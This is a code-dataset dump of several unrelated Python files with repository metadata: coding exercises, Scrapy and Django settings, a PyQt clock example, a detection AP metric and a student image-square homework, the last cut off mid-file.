3b15727e1ace910554d9e47e1fc36e68e74aabc0 | c2002f5451a52450db536088cf1f4beec9d23d7f | /0x1C-makefiles/5-island_perimeter.py | 8032bfe4825143c89eebadc851220ba5e6f3a2c5 | [] | no_license | JulianCanoDev/holbertonschool-low_level_programming | d23e10cb14d4cf5bffcb8601bb2e4a7eaf3c3038 | 6484d00870b0578a8acaba0ff125bf2e476828dc | refs/heads/master | 2021-07-12T21:10:35.513238 | 2021-06-22T22:25:17 | 2021-06-22T22:25:17 | 238,518,191 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 540 | py | #!/usr/bin/python3
"""
Defines an island perimeter measuring
"""
def island_perimeter(grid):
    """
    Return the perimeter of the island described by *grid*.

    Every land cell (value 1) contributes four edge units; each pair of
    horizontally or vertically adjacent land cells hides two of them.
    """
    rows = len(grid)
    cols = len(grid[0])
    land = 0
    shared = 0
    for r in range(rows):
        for col in range(cols):
            if grid[r][col] != 1:
                continue
            land += 1
            # Count each internal border once, looking left and up only.
            if col and grid[r][col - 1] == 1:
                shared += 1
            if r and grid[r - 1][col] == 1:
                shared += 1
    return land * 4 - shared * 2
| [
"juliancano.dev@gmail.com"
] | juliancano.dev@gmail.com |
661c565ec03275a3d21d78d26923358819478938 | b683c8f1942a1ab35062620c6013b1e223c09e92 | /Python-Files/Day-21/Question-87-alternative-solution-2.py | d1f23c21c0e660f4e332852acd43bab6779845c7 | [] | no_license | nihathalici/Break-The-Ice-With-Python | 601e1c0f040e02fe64103c77795deb2a5d8ff00a | ef5b9dd961e8e0802eee171f2d54cdb92f2fdbe8 | refs/heads/main | 2023-07-18T01:13:27.277935 | 2021-08-27T08:19:44 | 2021-08-27T08:19:44 | 377,414,827 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 426 | py | """
Question 87
Question
With two given lists [1,3,6,78,35,55] and [12,24,35,24,88,120,155],
write a program to make a list whose elements are
intersection of the above given lists.
Hints
Use set() and "&=" to do set intersection operation.
"""
# Question 87: print the list of elements common to both given lists.
list1 = [1, 3, 6, 78, 35, 55]
list2 = [12, 24, 35, 24, 88, 120, 155]
set1 = set(list1)
set2 = set(list2)
# The & operator performs the same operation as set.intersection().
intersection = set1 & set2
print(list(intersection))
| [
"noreply@github.com"
] | nihathalici.noreply@github.com |
4f3d07f153b1f95a64a58781bc02da8823cfab74 | 376e2608fcedd1407d8c2a65634220984bbd9b85 | /alpenbank/settings.py | 1ba723fa8566bcf23684c4aa5e5a47d21f914256 | [] | no_license | SimeonYS/alpenbank | c2128697deab2c4f2fd97ea87ac7810cf889ebab | a0f46ad71cde350bec4e30a851708428e32be72e | refs/heads/main | 2023-03-09T09:11:26.534659 | 2021-02-23T11:42:00 | 2021-02-23T11:42:00 | 341,535,561 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 392 | py | BOT_NAME = 'alpenbank'
# Scrapy settings for the "alpenbank" article scraper.
SPIDER_MODULES = ['alpenbank.spiders']
NEWSPIDER_MODULE = 'alpenbank.spiders'
# Export feeds as UTF-8 so non-ASCII article text survives.
FEED_EXPORT_ENCODING = 'utf-8'
# Only log errors; do not throttle between requests.
LOG_LEVEL = 'ERROR'
DOWNLOAD_DELAY = 0
# Impersonate a desktop Chrome browser.
USER_AGENT="Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36"
ROBOTSTXT_OBEY = True
ITEM_PIPELINES = {
'alpenbank.pipelines.AlpenbankPipeline': 300,
} | [
"simeon.simeonov@ADPVT.com"
] | simeon.simeonov@ADPVT.com |
e4e175743927d2d38466815d4429550bd4380b0f | a5a99f646e371b45974a6fb6ccc06b0a674818f2 | /RecoJets/JetProducers/python/fixedGridRhoProducer_cfi.py | 6f9ee1ae1a6df7a91ece5014cdba4413192be8b4 | [
"Apache-2.0"
] | permissive | cms-sw/cmssw | 4ecd2c1105d59c66d385551230542c6615b9ab58 | 19c178740257eb48367778593da55dcad08b7a4f | refs/heads/master | 2023-08-23T21:57:42.491143 | 2023-08-22T20:22:40 | 2023-08-22T20:22:40 | 10,969,551 | 1,006 | 3,696 | Apache-2.0 | 2023-09-14T19:14:28 | 2013-06-26T14:09:07 | C++ | UTF-8 | Python | false | false | 497 | py | import FWCore.ParameterSet.Config as cms
# Three instances of the FixedGridRhoProducer EDProducer, identical except
# for the detector eta region over which rho is computed from the
# particle-flow candidate collection.
fixedGridRhoCentral = cms.EDProducer("FixedGridRhoProducer",
    pfCandidatesTag = cms.InputTag("particleFlow"),
    EtaRegion = cms.string("Central")
    )
fixedGridRhoForward = cms.EDProducer("FixedGridRhoProducer",
    pfCandidatesTag = cms.InputTag("particleFlow"),
    EtaRegion = cms.string("Forward")
    )
fixedGridRhoAll = cms.EDProducer("FixedGridRhoProducer",
    pfCandidatesTag = cms.InputTag("particleFlow"),
    EtaRegion = cms.string("All")
    )
| [
"giulio.eulisse@gmail.com"
] | giulio.eulisse@gmail.com |
c4695c901a02a94e112fab81598f233dc0534459 | fcaa0395a7c6aa74cbc47c40f35fdc312e44b9c5 | /aok/comparisons/__init__.py | 00898d6b19afe33e80500e988e0cc24bd6dfcf91 | [] | no_license | rocketboosters/a-ok | b6f1a70d262123c2df5e4969a687cbcfdfbafc8c | 06f31404a4ce34d561253ba74b533ce3fb73c60c | refs/heads/main | 2023-09-02T19:18:18.158296 | 2021-11-03T01:54:36 | 2021-11-03T01:54:36 | 388,142,177 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,275 | py | """Comparison operators subpackage for the aok library."""
from aok.comparisons._basics import Anything # noqa: F401
from aok.comparisons._basics import Between # noqa: F401
from aok.comparisons._basics import Equals # noqa: F401
from aok.comparisons._basics import Greater # noqa: F401
from aok.comparisons._basics import GreaterOrEqual # noqa: F401
from aok.comparisons._basics import Less # noqa: F401
from aok.comparisons._basics import LessOrEqual # noqa: F401
from aok.comparisons._basics import NoneOf # noqa: F401
from aok.comparisons._basics import OneOf # noqa: F401
from aok.comparisons._basics import Unequals # noqa: F401
from aok.comparisons._basics import anything # noqa: F401
from aok.comparisons._basics import between # noqa: F401
from aok.comparisons._basics import equals # noqa: F401
from aok.comparisons._basics import greater # noqa: F401
from aok.comparisons._basics import greater_or_equal # noqa: F401
from aok.comparisons._basics import less # noqa: F401
from aok.comparisons._basics import less_or_equal # noqa: F401
from aok.comparisons._basics import none_of # noqa: F401
from aok.comparisons._basics import one_of # noqa: F401
from aok.comparisons._basics import unequals # noqa: F401
from aok.comparisons._dicts import Dict # noqa: F401
from aok.comparisons._dicts import Okay # noqa: F401
from aok.comparisons._lists import JsonList # noqa: F401
from aok.comparisons._lists import List # noqa: F401
from aok.comparisons._lists import OkayList # noqa: F401
from aok.comparisons._lists import StrictList # noqa: F401
from aok.comparisons._lists import Tuple # noqa: F401
from aok.comparisons._lists import json_list # noqa: F401
from aok.comparisons._nullish import NotNull # noqa: F401
from aok.comparisons._nullish import Optional # noqa: F401
from aok.comparisons._nullish import not_null # noqa: F401
from aok.comparisons._nullish import optional # noqa: F401
from aok.comparisons._strings import Like # noqa: F401
from aok.comparisons._strings import LikeCase # noqa: F401
from aok.comparisons._strings import Match # noqa: F401
from aok.comparisons._strings import like # noqa: F401
from aok.comparisons._strings import like_case # noqa: F401
from aok.comparisons._strings import match # noqa: F401
| [
"swernst@gmail.com"
] | swernst@gmail.com |
2acf663118eb22264c326d53e1cc3e0f86209fce | d737fa49e2a7af29bdbe5a892bce2bc7807a567c | /software/qt_examples/src/pyqt-official/widgets/shapedclock.py | 0c1c44b50df3de59c7adebb087f4f9d2b396d3f4 | [
"GPL-3.0-only",
"MIT",
"CC-BY-NC-SA-4.0",
"GPL-1.0-or-later"
] | permissive | TG-Techie/CASPER | ec47dfbfd6c3a668739ff4d707572e0b853518b4 | 2575d3d35e7dbbd7f78110864e659e582c6f3c2e | refs/heads/master | 2020-12-19T12:43:53.825964 | 2020-01-23T17:24:04 | 2020-01-23T17:24:04 | 235,736,872 | 0 | 1 | MIT | 2020-01-23T17:09:19 | 2020-01-23T06:29:10 | Python | UTF-8 | Python | false | false | 5,194 | py | #!/usr/bin/env python
#############################################################################
##
## Copyright (C) 2013 Riverbank Computing Limited.
## Copyright (C) 2010 Nokia Corporation and/or its subsidiary(-ies).
## All rights reserved.
##
## This file is part of the examples of PyQt.
##
## $QT_BEGIN_LICENSE:BSD$
## You may use this file under the terms of the BSD license as follows:
##
## "Redistribution and use in source and binary forms, with or without
## modification, are permitted provided that the following conditions are
## met:
## * Redistributions of source code must retain the above copyright
## notice, this list of conditions and the following disclaimer.
## * Redistributions in binary form must reproduce the above copyright
## notice, this list of conditions and the following disclaimer in
## the documentation and/or other materials provided with the
## distribution.
## * Neither the name of Nokia Corporation and its Subsidiary(-ies) nor
## the names of its contributors may be used to endorse or promote
## products derived from this software without specific prior written
## permission.
##
## THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
## "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
## LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
## A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
## OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
## SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
## LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
## DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
## THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
## (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
## OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE."
## $QT_END_LICENSE$
##
#############################################################################
from PyQt5.QtCore import QPoint, QSize, Qt, QTime, QTimer
from PyQt5.QtGui import QColor, QPainter, QPolygon, QRegion
from PyQt5.QtWidgets import QAction, QApplication, QWidget
class ShapedClock(QWidget):
    """Frameless, circular analog clock widget (PyQt5 example).

    The window is masked to an ellipse in resizeEvent(), can be dragged
    with the left mouse button, and repaints once per second.
    """
    # Hand shapes in the logical 200x200 coordinate system (origin centre).
    hourHand = QPolygon([
        QPoint(7, 8),
        QPoint(-7, 8),
        QPoint(0, -40)
    ])
    minuteHand = QPolygon([
        QPoint(7, 8),
        QPoint(-7, 8),
        QPoint(0, -70)
    ])
    hourColor = QColor(127, 0, 127)
    minuteColor = QColor(0, 127, 127, 191)
    def __init__(self, parent=None):
        """Create the frameless window, the 1 s repaint timer and a quit action."""
        super(ShapedClock, self).__init__(parent,
                Qt.FramelessWindowHint | Qt.WindowSystemMenuHint)
        timer = QTimer(self)
        timer.timeout.connect(self.update)
        timer.start(1000)
        quitAction = QAction("E&xit", self, shortcut="Ctrl+Q",
                triggered=QApplication.instance().quit)
        self.addAction(quitAction)
        self.setContextMenuPolicy(Qt.ActionsContextMenu)
        self.setToolTip("Drag the clock with the left mouse button.\n"
                "Use the right mouse button to open a context menu.")
        self.setWindowTitle(self.tr("Shaped Analog Clock"))
    def mousePressEvent(self, event):
        """Remember the click offset so the frameless window can be dragged."""
        if event.button() == Qt.LeftButton:
            self.dragPosition = event.globalPos() - self.frameGeometry().topLeft()
            event.accept()
    def mouseMoveEvent(self, event):
        """Move the window while the left button is held down."""
        if event.buttons() == Qt.LeftButton:
            self.move(event.globalPos() - self.dragPosition)
            event.accept()
    def paintEvent(self, event):
        """Draw hour/minute hands and tick marks for the current time."""
        side = min(self.width(), self.height())
        time = QTime.currentTime()
        painter = QPainter(self)
        painter.setRenderHint(QPainter.Antialiasing)
        # Work in a centred 200x200 logical coordinate system.
        painter.translate(self.width() / 2, self.height() / 2)
        painter.scale(side / 200.0, side / 200.0)
        painter.setPen(Qt.NoPen)
        painter.setBrush(ShapedClock.hourColor)
        # Hour hand: 30 degrees per hour, plus the minute fraction.
        painter.save()
        painter.rotate(30.0 * ((time.hour() + time.minute() / 60.0)))
        painter.drawConvexPolygon(ShapedClock.hourHand)
        painter.restore()
        painter.setPen(ShapedClock.hourColor)
        # Twelve hour marks.
        for i in range(12):
            painter.drawLine(88, 0, 96, 0)
            painter.rotate(30.0)
        painter.setPen(Qt.NoPen)
        painter.setBrush(ShapedClock.minuteColor)
        # Minute hand: 6 degrees per minute, plus the second fraction.
        painter.save()
        painter.rotate(6.0 * (time.minute() + time.second() / 60.0))
        painter.drawConvexPolygon(ShapedClock.minuteHand)
        painter.restore()
        painter.setPen(ShapedClock.minuteColor)
        # Minute marks, skipping positions already covered by hour marks.
        for j in range(60):
            if (j % 5) != 0:
                painter.drawLine(92, 0, 96, 0)
            painter.rotate(6.0)
    def resizeEvent(self, event):
        """Clip the widget to a centred circle so only the clock face shows."""
        side = min(self.width(), self.height())
        maskedRegion = QRegion(self.width()/2 - side/2, self.height()/2 - side/2, side, side, QRegion.Ellipse)
        self.setMask(maskedRegion)
    def sizeHint(self):
        """Preferred size of the clock widget."""
        return QSize(100, 100)
if __name__ == '__main__':
    # Stand-alone demo: show the clock in its own Qt application.
    import sys
    app = QApplication(sys.argv)
    clock = ShapedClock()
    clock.show()
    sys.exit(app.exec_())
| [
"TGTechie01@gmail.com"
] | TGTechie01@gmail.com |
7aa75076d646b49b3ef2cc13d97d1040ad806a7e | e8790304ded051df1d6bce56e2a5df32b2a8bd71 | /eshop/cart/forms.py | b0489422ab83f7a8647ce15df7868070e106b02a | [] | no_license | puskarkarki/TrialEcommerce | d5769c348937f66d6a8d7bd25eef4fc581856219 | a8afd83a93c6299b5505b23d74d8740e3ee66928 | refs/heads/master | 2023-08-31T23:43:25.965510 | 2021-09-22T12:09:30 | 2021-09-22T12:09:30 | 405,687,882 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 315 | py | from django import forms
# Quantity choices 1..99 as (value, label) pairs for the ChoiceField below.
PRODUCT_QUANTITY_OPTIONS = [(i, str(i)) for i in range(1, 100)]
class AddProductToCartForm(forms.Form):
    """Form used to add a product (with a quantity) to the shopping cart."""
    # Selected quantity, coerced back to int during cleaning.
    quantity = forms.TypedChoiceField(choices=PRODUCT_QUANTITY_OPTIONS, coerce=int)
    # Hidden flag; NOTE(review): presumably tells the cart view to replace
    # the stored quantity instead of adding to it -- confirm in the view.
    override = forms.BooleanField(required=False, initial=False, widget=forms.HiddenInput)
| [
"puskarrajkarki1234@gmail.com"
] | puskarrajkarki1234@gmail.com |
50986868ac3beda7336d080eb3fedccbd1f18816 | e89693a2906534fa4a9d180b404cb96751302e8c | /reference_info.py | de35a29f7f6ccdf45cf70a74977b76abd0910368 | [] | permissive | friedrich-schotte/Lauecollect | e278e00692d109e98450c27502986673bf59db6a | acfc5afe34b4df5891a0f8186b8df76625afb51d | refs/heads/master | 2022-09-12T02:59:04.363963 | 2022-08-18T16:39:01 | 2022-08-18T16:39:01 | 186,062,944 | 0 | 2 | MIT | 2020-07-20T02:04:07 | 2019-05-10T22:42:26 | Python | UTF-8 | Python | false | false | 3,529 | py | """
Author: Friedrich Schotte
Date created: 2022-06-23
Date last modified: 2022-06-23
Revision comment:
"""
__version__ = "1.0"
import logging
from threading import Lock
def reference_info(reference, payload_type, *args, **kwargs):
    """Return the payload of *payload_type* cached on the container
    associated with *reference*, creating it on first use.

    The payload is stored under the lower-cased type name.  Creation is
    double-checked under the container's lock so concurrent callers end
    up sharing one instance; extra arguments are forwarded to the
    payload_type constructor only when a new payload is built.
    """
    info = attribute_or_item_reference_container(reference)
    slot = payload_type.__name__.lower()
    if not hasattr(info, slot):
        with info.lock:
            # Re-check under the lock: another thread may have won the race.
            if not hasattr(info, slot):
                setattr(info, slot, payload_type(*args, **kwargs))
    return getattr(info, slot)
def attribute_or_item_reference_container(reference):
    """Dispatch to the attribute- or item-based container lookup.

    Attribute references carry an ``attribute_name``; item references
    carry an ``index``.  Anything else raises AttributeError.
    """
    if hasattr(reference, "attribute_name"):
        return attribute_reference_container(reference)
    if hasattr(reference, "index"):
        return item_reference_container(reference)
    raise AttributeError(f"{reference} is missing attributes 'attribute_name' or 'index'")
def attribute_reference_container(reference):
    """Return (creating on demand) the Container stored on the referenced
    object under ``__<attribute_name>__info__``.

    Creation is double-checked under the per-object attribute-info lock.
    """
    target = reference.object
    slot = f"__{reference.attribute_name}__info__"
    if not hasattr(target, slot):
        with attribute_info_lock(target):
            # Re-check: another thread may already have created it.
            if not hasattr(target, slot):
                setattr(target, slot, Container())
    return getattr(target, slot)
def item_reference_container(reference):
    """Return (creating on demand) the Container for one indexed item.

    Item containers live in a per-object dict stored under
    ``__item_info__``; both the dict and each entry are created lazily
    with double-checked locking on the per-object item-info lock.
    """
    obj = reference.object
    item = reference.index
    container_dict_name = "__item_info__"
    # First make sure the per-object dict itself exists.
    if not hasattr(obj, container_dict_name):
        with item_info_lock(obj):
            if not hasattr(obj, container_dict_name):
                setattr(obj, container_dict_name, {})
    container_dict = getattr(obj, container_dict_name)
    # Then make sure this item's entry exists.
    if item not in container_dict:
        with item_info_lock(obj):
            if item not in container_dict:
                # logging.debug(f"{obj}.{container_dict_name}.[{item}] = {Container()}")
                container_dict[item] = Container()
    container = container_dict[item]
    return container
def attribute_info_lock(obj):
    # Per-object lock guarding creation of attribute-info containers.
    return object_lock(obj, "attribute_info")
def item_info_lock(obj):
    # Per-object lock guarding creation of item-info containers.
    return object_lock(obj, "item_info")
def object_lock(obj, name):
    """Return a per-object Lock stored on *obj* as ``__<name>_lock__``,
    creating it on first request.

    Creation of the per-object lock is itself serialized through the
    module-level ``global_lock`` (double-checked), so every caller sees
    the same Lock instance.
    """
    slot = f"__{name}_lock__"
    if not hasattr(obj, slot):
        with global_lock:
            # Re-check: another thread may have created the lock already.
            if not hasattr(obj, slot):
                setattr(obj, slot, Lock())
    return getattr(obj, slot)


# Serializes the creation of all per-object locks.
global_lock = Lock()
class Container:
    """Attribute bag used to cache payloads for one reference.

    Carries its own Lock so payload creation can be double-checked.
    """

    def __init__(self):
        # One lock per container; guards lazy payload creation.
        self.lock = Lock()

    @property
    def class_name(self):
        """Name of the concrete class, used by __repr__."""
        return type(self).__name__

    def __repr__(self):
        return f"{self.class_name}()"
if __name__ == '__main__':
    # Ad-hoc interactive test against the BioCARS timing system; requires
    # the project's timing_system_client and reference modules.
    msg_format = "%(asctime)s %(levelname)s %(module)s.%(funcName)s, line %(lineno)d: %(message)s"
    logging.basicConfig(level=logging.DEBUG, format=msg_format)
    from timing_system_client import timing_system_client
    from reference import reference as _reference
    domain_name = "BioCARS"
    timing_system = timing_system_client(domain_name)
    reference = _reference(timing_system.channels.xdet.trig_count, "count")
    self = attribute_or_item_reference_container(reference)
| [
"friedrich.schotte@gmail.com"
] | friedrich.schotte@gmail.com |
1bda04dee8ec7d57057dc9c1002af3262d36d79f | 26552adb0d8889affd40e009d3c311e41a873e43 | /Python_Solutions/16003.py | 1d232c99deebfd3a3fb463781eb54a524dcccaef | [] | no_license | Isaac-Lee/BOJ-Algorithm | 3b9b64aba9ab3b48d15133cbf5ad122822e441d0 | 27f0339195c48f416e672390758e85305203b71a | refs/heads/main | 2022-06-29T21:36:11.500158 | 2022-06-25T06:35:05 | 2022-06-25T06:35:05 | 203,349,860 | 4 | 0 | null | null | null | null | UTF-8 | Python | false | false | 693 | py | nm = [int(k) for k in input().split()]
# Adjacency list for nm[0] vertices; nm (vertex/edge counts) was read above.
nList = [[] for i in range(nm[0])]
re=[]
mNum ={}
# Read nm[1] undirected edges (1-based in the input, stored 0-based).
for i in range(nm[1]):
    m = [int(m) for m in input().split()]
    nList[m[0]-1].append(m[1]-1)
    nList[m[1]-1].append(m[0]-1)
print(nList)
# Degree of each vertex.
for j in range(nm[0]):
    mNum[j] = len(nList[j])
print(mNum)
# Greedy: repeatedly pick the vertex with minimum degree and remove it
# from every other adjacency list.
# NOTE(review): nList[index].remove(mini) raises ValueError whenever
# `mini` is not actually a neighbour of `index` -- the author's note
# below records the same error; this attempt is unfinished.
for k in range(nm[1]):
    mini = list(mNum.values()).index(min(mNum.values()))
    re.append(mini)
    print(mini)
    for index in range(nm[0]):
        print(index)
        if index != mini:
            print(nList[index])
            nList[index].remove(mini)
            mNum[index] -= 1
# print(nList)
# print(mNum)
# print(re)
'''미해결'''
'''
nList[index].remove(mini)에서 에러
'''
"yy0221ss@gmail.com"
] | yy0221ss@gmail.com |
f4efbd707a0ea513abca53dd28189b88cc398eeb | a5bffa3c32a4955648345a201c3be4fe0a324136 | /utils/box/metric.py | 1cade1c54a41deec5844621516e8934dad9ba6ed | [
"MIT"
] | permissive | ming71/SLA | 178282e0ae1ecba8512f4b4b69f0d721a3c590b4 | 7024b093bc0d456b274314ebeae3bc500c2db65a | refs/heads/master | 2023-08-02T06:10:50.893229 | 2021-09-24T02:11:50 | 2021-09-24T02:11:50 | 370,882,400 | 11 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,602 | py | import numpy as np
from collections import defaultdict, Counter
from .rbbox_np import rbbox_iou
def get_ap(recall, precision):
    """All-point interpolated average precision, as a percentage.

    The precision curve is first made monotonically non-increasing from
    right to left, then the area under the precision/recall curve is
    accumulated over the recall steps.
    """
    rec = [0, *recall, 1]
    prec = [0, *precision, 0]
    # Envelope: each point takes the max precision to its right.
    for idx in reversed(range(1, len(prec))):
        if prec[idx] > prec[idx - 1]:
            prec[idx - 1] = prec[idx]
    area = 0
    for idx in range(1, len(rec)):
        if rec[idx] != rec[idx - 1]:
            area += (rec[idx] - rec[idx - 1]) * prec[idx]
    return area * 100
def get_ap_07(recall, precision):
    """VOC2007-style 11-point interpolated average precision, in percent.

    *recall* and *precision* must be numpy arrays (boolean-mask indexing
    is used).  For each threshold t in {0.0, 0.1, ..., 1.0} the maximum
    precision at recall >= t contributes 1/11 of its value.
    """
    total = 0.
    for threshold in np.linspace(0, 1, 11, endpoint=True):
        selected = recall >= threshold
        if selected.any():
            total += precision[selected].max() / 11
    return total * 100
def get_det_aps(detect, target, num_classes, iou_thresh=0.5, use_07_metric=False):
    """Per-class average precision for rotated-box detections.

    Both *detect* and *target* are lists of [image_index, bbox, score,
    label] entries.  For each class, detections are matched greedily (by
    descending score) to the ground truth of the same image using
    rbbox_iou; a ground-truth box may be matched at most once.  Returns a
    list of one AP value (percent) per class.
    """
    # [[index, bbox, score, label], ...]
    aps = []
    for c in range(num_classes):
        # Restrict to class c; sort detections by confidence, best first.
        target_c = list(filter(lambda x: x[3] == c, target))
        detect_c = filter(lambda x: x[3] == c, detect)
        detect_c = sorted(detect_c, key=lambda x: x[2], reverse=True)
        tp = np.zeros(len(detect_c))
        fp = np.zeros(len(detect_c))
        # Per-image "already matched" flags, one slot per ground-truth box.
        target_count = Counter([x[0] for x in target_c])
        target_count = {index: np.zeros(count) for index, count in target_count.items()}
        target_lut = defaultdict(list)
        for index, bbox, conf, label in target_c:
            target_lut[index].append(bbox)
        detect_lut = defaultdict(list)
        for index, bbox, conf, label in detect_c:
            detect_lut[index].append(bbox)
        # Precompute IoU matrices per image (detections x ground truths).
        iou_lut = dict()
        for index, bboxes in detect_lut.items():
            if index in target_lut:
                iou_lut[index] = rbbox_iou(np.stack(bboxes), np.stack(target_lut[index]))
        # `counter` tracks each detection's row in its image's IoU matrix.
        counter = defaultdict(int)
        for i, (index, bbox, conf, label) in enumerate(detect_c):
            count = counter[index]
            counter[index] += 1
            iou_max = -np.inf
            hit_j = 0
            if index in iou_lut:
                # Best-overlapping ground-truth box for this detection.
                for j, iou in enumerate(iou_lut[index][count]):
                    if iou > iou_max:
                        iou_max = iou
                        hit_j = j
            # True positive only if overlap is sufficient and the ground
            # truth has not been claimed by a higher-scoring detection.
            if iou_max > iou_thresh and target_count[index][hit_j] == 0:
                tp[i] = 1
                target_count[index][hit_j] = 1
            else:
                fp[i] = 1
        # Cumulative precision/recall over the score-ranked detections.
        tp_sum = np.cumsum(tp)
        fp_sum = np.cumsum(fp)
        npos = len(target_c)
        recall = tp_sum / npos
        precision = tp_sum / (tp_sum + fp_sum)
        aps.append((get_ap_07 if use_07_metric else get_ap)(recall, precision))
    return aps
| [
"mq_chaser@126.com"
] | mq_chaser@126.com |
ef1bd6c833f07200173ede8a31562c463ffe5137 | f999bc5a6e0da4f0904ef2112d7b6191f180ca5b | /Practice/1/no_of_paths_mx.py | 0d9e16140066176ae5144fd71ec615bfba130cee | [] | no_license | ritesh-deshmukh/Algorithms-and-Data-Structures | 721485fbe91a5bdb4d7f99042077e3f813d177cf | 2d3a9842824305b1c64b727abd7c354d221b7cda | refs/heads/master | 2022-11-09T00:18:51.203415 | 2018-10-08T22:31:05 | 2018-10-08T22:31:05 | 132,504,988 | 0 | 1 | null | 2022-10-23T00:51:15 | 2018-05-07T19:07:33 | Python | UTF-8 | Python | false | false | 539 | py | def test(m,n):
    # DP table of path counts.
    # NOTE(review): built as n rows x m columns, but indexed below as
    # arr[row in range(m)][col in range(n)] -- only consistent when
    # m == n (m > n raises IndexError).  TODO: swap the range() arguments.
    arr = [[0 for _ in range(m)] for _ in range(n)]
    # First column and first row each have exactly one monotone path.
    for i in range(m):
        arr[i][0] = 1
    for j in range(n):
        arr[0][j] = 1
    # NOTE(review): j starts at 0, so arr[i][0] is recomputed from
    # arr[i][-1] (the still-zero last column), which keeps the value 1
    # only by accident -- starting the loop at j = 1 would be clearer.
    for i in range(1, m):
        for j in range(n):
            arr[i][j] = arr[i-1][j] + arr[i][j-1]
    print(arr)
    return arr[m-1][n-1]
    # print(arr, end=" ")
# Demo: a 3x3 grid has 6 monotone lattice paths.
m = 3
n = 3
print(test(m,n))
# def no_of_paths(m, n):
# if m == 1 or n == 1:
# return 1
#
# return no_of_paths(m-1, n) + no_of_paths(m, n-1)
#
#
# m = 3
# n = 3
#
# print(no_of_paths(m,n))
| [
"riteshdeshmukh260@gmail.com"
] | riteshdeshmukh260@gmail.com |
e4f11f4ce8171c561aea33859a1304ce7d33d527 | 4577d8169613b1620d70e3c2f50b6f36e6c46993 | /students/1719708/homework03/program01.py | 1d48e0a1c60c036592ba3307723907bbfdace1cb | [] | no_license | Fondamenti18/fondamenti-di-programmazione | cbaf31810a17b5bd2afaa430c4bf85d05b597bf0 | 031ec9761acb1a425fcc4a18b07884b45154516b | refs/heads/master | 2020-03-24T03:25:58.222060 | 2018-08-01T17:52:06 | 2018-08-01T17:52:06 | 142,419,241 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,464 | py | from immagini import *
def quadrato(filename,c):
    """Find the largest square of colour *c* in the image *filename*.

    Returns ``(side, (x, y))`` where the vertex is given as
    (column, row); ``side`` stays -1 when no square is recorded.
    ``load`` comes from the course's ``immagini`` helper module.
    """
    lato = [-1]
    vertice = [0, 0]
    img = load(filename)
    # Try every pixel of colour c as a candidate top-left corner;
    # cerca_quadrati mutates lato/vertice in place when it finds a better square.
    for row in range(len(img)):
        for col in range(len(img[0])):
            if img[row][col] == c:
                v = [row, col]
                cerca_quadrati(img, lato, vertice, v, c)
    return (lato[0], (vertice[1], vertice[0]))
def cerca_quadrati(image, lato, vertice, v, c):
    """Grow a candidate square anchored at v; record it when it beats lato[0]."""
    ok = True
    side = lato[0] + 1
    # Keep enlarging while the square still fits inside the image and the
    # colour checks keep passing.
    while ok and v[0] + side < len(image) and v[1] + side < len(image[0]):
        ok, side = controlli(image, side, v, c, ok)
    if not ok and lato[0] < side - 1:
        lato[0] = side
        vertice[:] = v[:]
def controlli(image, l, v, c, value):
    """Run all square checks at size l; return (still_growing, next_size)."""
    # Same short-circuit order as before: primary tests, then secondary.
    if primari(image, l, v, c) or secondari(image, l, v, c):
        return False, l
    return value, l + 1
def primari(image, l, v, c):
    """Primary rejection test: corners and both diagonals must all be colour c."""
    return not (vertici(image, l, v, c)
                and diagonale1(image, l, v, c)
                and diagonale2(image, l, v, c))
def secondari(image, l, v, c):
    """Secondary rejection test (skipped at size 0): border frame and interior."""
    if l == 0:
        return False
    return not frame(image, l, v, c) or not full(image, l, v, c)
def vertici(image, l, v, c):
    """True when the three remaining corners of the l-sized square equal c."""
    row, col = v
    return (image[row][col + l] == c
            and image[row + l][col] == c
            and image[row + l][col + l] == c)
def diagonale1(image, l, v, c):
    """True when every cell on the square's main diagonal equals c."""
    row, col = v
    for d in range(l + 1):
        if image[row + d][col + d] != c:
            return False
    return True
def diagonale2(image, l, v, c):
    """True when every cell on the square's anti-diagonal equals c."""
    row, col = v
    for d in range(l + 1):
        if image[row + d][col + l - d] != c:
            return False
    return True
def full(image, l, v, color):
    # Check that the interior of the square of side l anchored at v is made
    # entirely of `color`.  Scans row by row starting one pixel inside the
    # border; the scan stops at the first wrong pixel and the final return
    # reports whether the stopping pixel matched.
    r = v[0] + 1
    c = v[1] + 1
    l = l - 1  # work on the interior, one pixel in from the border
    while r < v[0] + l and image[r][c] == color:
        while c < v[1] + l and image[r][c] == color:
            c += 1
        if image[r][c] == color:
            r += 1
            c = v[1]  # NOTE(review): resets to the border column, not v[1] + 1 -- confirm intended
    return image[r][c] == color
def frame(image, l, v, color):
    """True when the whole border of the l-sized square at v is colour c.

    Checks the two vertical sides first (altezze) and only then the two
    horizontal sides (paralleli), preserving the original short-circuit
    order: when the vertical check fails the horizontal one never runs.

    Fixes: removed a dead `i = 0` assignment and the fragile pattern of
    defining `value2` only inside the `if` branch (it was never looked up
    on the failing path thanks to `and` short-circuiting, but any later
    refactor would have hit a NameError).
    """
    r, c = v
    if not altezze(image, r, c, l, color):
        return False
    return paralleli(image, r, c, l, color)
def altezze(image, r, c, l, color):
